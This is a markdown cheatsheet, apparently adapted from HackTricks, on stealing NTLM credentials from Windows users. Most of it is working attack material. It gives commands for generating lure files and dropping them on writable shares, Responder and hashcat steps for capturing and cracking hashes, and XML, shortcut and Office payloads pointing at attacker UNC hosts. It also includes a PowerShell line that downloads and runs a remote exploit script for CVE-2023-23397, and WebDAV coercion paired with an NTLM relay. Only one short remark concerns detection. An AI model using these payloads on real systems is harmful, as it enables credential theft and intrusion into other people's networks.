daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

places-to-steal-ntlm-creds.md (12897B)


      1 ---
      2 title: "Places to steal NTLM creds"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Places to steal NTLM creds
     14 
     15 **Check all the great ideas from [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**<sup>[[12]](#references)[[13]](#references)[[14]](#references)</sup>
     16 
     17 ### Writable SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini)
     18 
     19 If you can **write to a share that users or scheduled jobs browse in Explorer**, drop files whose metadata points to your UNC (e.g. `\\ATTACKER\share`). Rendering the folder triggers **implicit SMB authentication** and leaks a **NetNTLMv2** to your listener.<sup>[[1]](#references)</sup>
     20 
     21 1. **Generate lures** (covers SCF/URL/LNK/library-ms/desktop.ini/Office/RTF/etc.)
     22 
     23 ```bash
     24 git clone https://github.com/Greenwolf/ntlm_theft && cd ntlm_theft
     25 uv add --script ntlm_theft.py xlsxwriter
     26 uv run ntlm_theft.py -g all -s <attacker_ip> -f lure
     27 ```
     28 
     29 2. **Drop them on the writable share** (any folder the victim opens):
     30 
     31 ```bash
     32 smbclient //victim/share -U 'guest%'
     33 cd transfer\
     34 prompt off
     35 mput lure/*
     36 ```
     37 
     38 3. **Listen and crack**:
     39 
     40 ```bash
     41 sudo responder -I <iface>          # capture NetNTLMv2
     42 hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt  # autodetects mode 5600
     43 ```
     44 
     45 Windows may hit several files at once; anything Explorer previews (`BROWSE TO FOLDER`) requires no clicks.
     46 
     47 ### Windows Media Player playlists (.ASX/.WAX)
     48 
     49 If you can get a target to open or preview a Windows Media Player playlist you control, you can leak Net‑NTLMv2 by pointing the entry to a UNC path. WMP will attempt to fetch the referenced media over SMB and will authenticate implicitly.<sup>[[3]](#references)[[4]](#references)</sup>
     50 
     51 Example payload:
     52 
     53 ```xml
     54 <asx version="3.0">
     55   <title>Leak</title>
     56   <entry>
     57     <title></title>
     58     <ref href="file://ATTACKER_IP\\share\\track.mp3" />
     59   </entry>
     60 </asx>
     61 ```
     62 
     63 Collection and cracking flow:
     64 
     65 ```bash
     66 # Capture the authentication
     67 sudo Responder -I <iface>
     68 
     69 # Crack the captured NetNTLMv2
     70 hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
     71 ```
     72 
     73 ### ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)
     74 
     75 Windows Explorer insecurely handles .library-ms files when they are opened directly from within a ZIP archive. If the library definition points to a remote UNC path (e.g., \\attacker\share), simply browsing/launching the .library-ms inside the ZIP causes Explorer to enumerate the UNC and emit NTLM authentication to the attacker. This yields a NetNTLMv2 that can be cracked offline or potentially relayed.<sup>[[2]](#references)</sup>
     76 
     77 Minimal .library-ms pointing to an attacker UNC
     78 
     79 ```xml
     80 <?xml version="1.0" encoding="UTF-8"?>
     81 <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
     82   <version>6</version>
     83   <name>Company Documents</name>
     84   <isLibraryPinned>false</isLibraryPinned>
     85   <iconReference>shell32.dll,-235</iconReference>
     86   <templateInfo>
     87     <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
     88   </templateInfo>
     89   <searchConnectorDescriptionList>
     90     <searchConnectorDescription>
     91       <simpleLocation>
     92         <url>\\10.10.14.2\share</url>
     93       </simpleLocation>
     94     </searchConnectorDescription>
     95   </searchConnectorDescriptionList>
     96 </libraryDescription>
     97 ```
     98 
     99 Operational steps
    100 - Create the .library-ms file with the XML above (set your IP/hostname).
    101 - Zip it (on Windows: Send to → Compressed (zipped) folder) and deliver the ZIP to the target.
    102 - Run an NTLM capture listener and wait for the victim to open the .library-ms from inside the ZIP.
    103 
    104 
    105 ### Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak
    106 
    107 Microsoft Outlook for Windows processed the extended MAPI property PidLidReminderFileParameter in calendar items. If that property points to a UNC path (e.g., \\attacker\share\alert.wav), Outlook would contact the SMB share when the reminder fires, leaking the user’s Net‑NTLMv2 without any click. This was patched on March 14, 2023, but it’s still highly relevant for legacy/untouched fleets and for historical incident response.<sup>[[5]](#references)</sup>
    108 
    109 Quick exploitation with PowerShell (Outlook COM):
    110 
    111 ```powershell
    112 # Run on a host with Outlook installed and a configured mailbox
    113 IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
    114 Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
    115 # Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
    116 ```
    117 
    118 Listener side:
    119 
    120 ```bash
    121 sudo responder -I eth0  # or impacket-smbserver to observe connections
    122 ```
    123 
    124 Notes
    125 - A victim only needs Outlook for Windows running when the reminder triggers.
    126 - The leak yields Net‑NTLMv2 suitable for offline cracking or relay (not pass‑the‑hash).
    127 
    128 
    129 ### .LNK/.URL icon-based zero‑click NTLM leak (CVE‑2025‑50154 – bypass of CVE‑2025‑24054)
    130 
    131 Windows Explorer renders shortcut icons automatically. Recent research showed that even after Microsoft’s April 2025 patch for UNC‑icon shortcuts, it was still possible to trigger NTLM authentication with no clicks by hosting the shortcut target on a UNC path and keeping the icon local (patch bypass assigned CVE‑2025‑50154). Merely viewing the folder causes Explorer to retrieve metadata from the remote target, emitting NTLM to the attacker SMB server.<sup>[[6]](#references)</sup>
    132 
    133 Minimal Internet Shortcut payload (.url):
    134 
    135 ```ini
    136 [InternetShortcut]
    137 URL=http://intranet
    138 IconFile=\\10.10.14.2\share\icon.ico
    139 IconIndex=0
    140 ```
    141 
    142 Program Shortcut payload (.lnk) via PowerShell:
    143 
    144 ```powershell
    145 $lnk = "$env:USERPROFILE\Desktop\lab.lnk"
    146 $w = New-Object -ComObject WScript.Shell
    147 $sc = $w.CreateShortcut($lnk)
    148 $sc.TargetPath = "\\10.10.14.2\share\payload.exe"  # remote UNC target
    149 $sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
    150 $sc.Save()
    151 ```
    152 
    153 Delivery ideas
    154 - Drop the shortcut in a ZIP and get the victim to browse it.
    155 - Place the shortcut on a writable share the victim will open.
    156 - Combine with other lure files in the same folder so Explorer previews the items.
    157 
    158 ### No-click .LNK NTLM leak via ExtraData icon path (CVE‑2026‑25185)
    159 
    160 Windows loads `.lnk` metadata during **view/preview** (icon rendering), not only on execution. CVE‑2026‑25185 shows a parsing path where **ExtraData** blocks cause the shell to resolve an icon path and touch the filesystem **during load**, emitting outbound NTLM when the path is remote.
    161 
    162 Key trigger conditions (observed in `CShellLink::_LoadFromStream`):
    163 - Include **DARWIN_PROPS** (`0xa0000006`) in ExtraData (gate to icon update routine).
    164 - Include **ICON_ENVIRONMENT_PROPS** (`0xa0000007`) with **TargetUnicode** populated.
    165 - The loader expands environment variables in `TargetUnicode` and calls `PathFileExistsW` on the resulting path.
    166 
    167 If `TargetUnicode` resolves to a UNC path (e.g., `\\attacker\share\icon.ico`), **merely viewing a folder** containing the shortcut causes outbound authentication. The same load path can also be hit by **indexing** and **AV scanning**, making it a practical no‑click leak surface.<sup>[[7]](#references)</sup>
    168 
    169 Research tooling (parser/generator/UI) is available in the **LnkMeMaybe** project to build/inspect these structures without using the Windows GUI.<sup>[[8]](#references)</sup>
    170 
    171 
    172 ### WebDAV auth coercion / credential validation via `davclnt.dll,DavSetCookie`
    173 
    174 The native **WebDAV client** can be abused to force the current logon session to authenticate to an arbitrary **HTTP/WebDAV** endpoint:
    175 
    176 ```batch
    177 rundll32.exe davclnt.dll,DavSetCookie <HOST> http://<TARGET>/C$/Windows
    178 ```
    179 
    180 Why this is useful:
    181 - Against an **attacker-controlled WebDAV server**, it can trigger **NTLM over HTTP** without dropping a custom client.
    182 - Against **internal hosts**, it is a quiet way to **validate where stolen credentials are accepted** before moving laterally.<sup>[[9]](#references)</sup>
    183 - The command is a good alternative when **SMB egress is filtered** but **HTTP/WebDAV** is still reachable.
    184 
    185 Operational notes:
    186 - The **WebClient** service must be running on the source host.
    187 - `rundll32.exe` loads `davclnt.dll` and makes Windows handle the WebDAV authentication using the **current user's credentials**.<sup>[[10]](#references)</sup>
    188 - If you point it to infrastructure you control, use an NTLM-aware HTTP listener/relay such as:
    189 
    190 ```bash
    191 # Capture or relay NTLM over HTTP/WebDAV
    192 ntlmrelayx.py -t smb://<TARGET> --http-port 80
    193 ```
    194 
    195 From a detection perspective, repeated `rundll32.exe davclnt.dll,DavSetCookie` executions against many internal systems are a strong signal of **credential validation / spray-like lateral movement prep** rather than normal user behaviour.<sup>[[9]](#references)[[11]](#references)</sup>
    196 
    197 ### Office remote template injection (.docx/.dotm) to coerce NTLM
    198 
    199 Office documents can reference an external template. If you set the attached template to a UNC path, opening the document will authenticate to SMB.
    200 
    201 Minimal DOCX relationship changes (inside word/):
    202 
    203 1) Edit word/settings.xml and add the attached template reference:
    204 
    205 ```xml
    206 <w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
    207 ```
    208 
    209 2) Edit word/_rels/settings.xml.rels and point rId1337 to your UNC:
    210 
    211 ```xml
    212 <Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
    213 ```
    214 
    215 3) Repack to .docx and deliver. Run your SMB capture listener and wait for the open.
    216 
    217 For post-capture ideas on relaying or abusing NTLM, check:
    218 
    219 [Readme](/hacktricks/windows-hardening/ntlm/overview)
    220 
    221 
    222 ## References
    223 - [1] [HTB: Breach – Writable share lures + Responder capture → NetNTLMv2 crack → Kerberoast svc_mssql](https://0xdf.gitlab.io/2026/02/10/htb-breach.html)
    224 - [2] [HTB Fluffy – ZIP .library‑ms auth leak (CVE‑2025‑24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)](https://0xdf.gitlab.io/2025/09/20/htb-fluffy.html)
    225 - [3] [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
    226 - [4] [Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/)
    227 - [5] [MSRC – Microsoft mitigates Outlook EoP (CVE‑2023‑23397) and explains the NTLM leak via PidLidReminderFileParameter](https://www.microsoft.com/en-us/msrc/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/)
    228 - [6] [Cymulate – Zero‑click, one NTLM: Microsoft security patch bypass (CVE‑2025‑50154)](https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/)
    229 - [7] [TrustedSec – LnkMeMaybe: A Review of CVE‑2026‑25185](https://trustedsec.com/blog/lnkmemaybe-a-review-of-cve-2026-25185)
    230 - [8] [TrustedSec LnkMeMaybe tooling](https://github.com/trustedsec/LnkMeMaybe)
    231 - [9] [Rapid7 – When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise](https://www.rapid7.com/blog/post/tr-it-support-dissecting-modelorat-campaign-microsoft-teams-compromise)
    232 - [10] [Microsoft Learn – davclnt.h header](https://learn.microsoft.com/en-us/windows/win32/api/davclnt/)
    233 - [11] [Splunk – Windows Rundll32 WebDAV Request](https://research.splunk.com/endpoint/320099b7-7eb1-4153-a2b4-decb53267de2/)
    234 - [12] [osandamalith.com - Places Of Interest In Stealing Netntlm Hashes](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes)
    235 - [13] [soufianetahiri/TeamsNTLMLeak](https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md)
    236 - [14] [p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)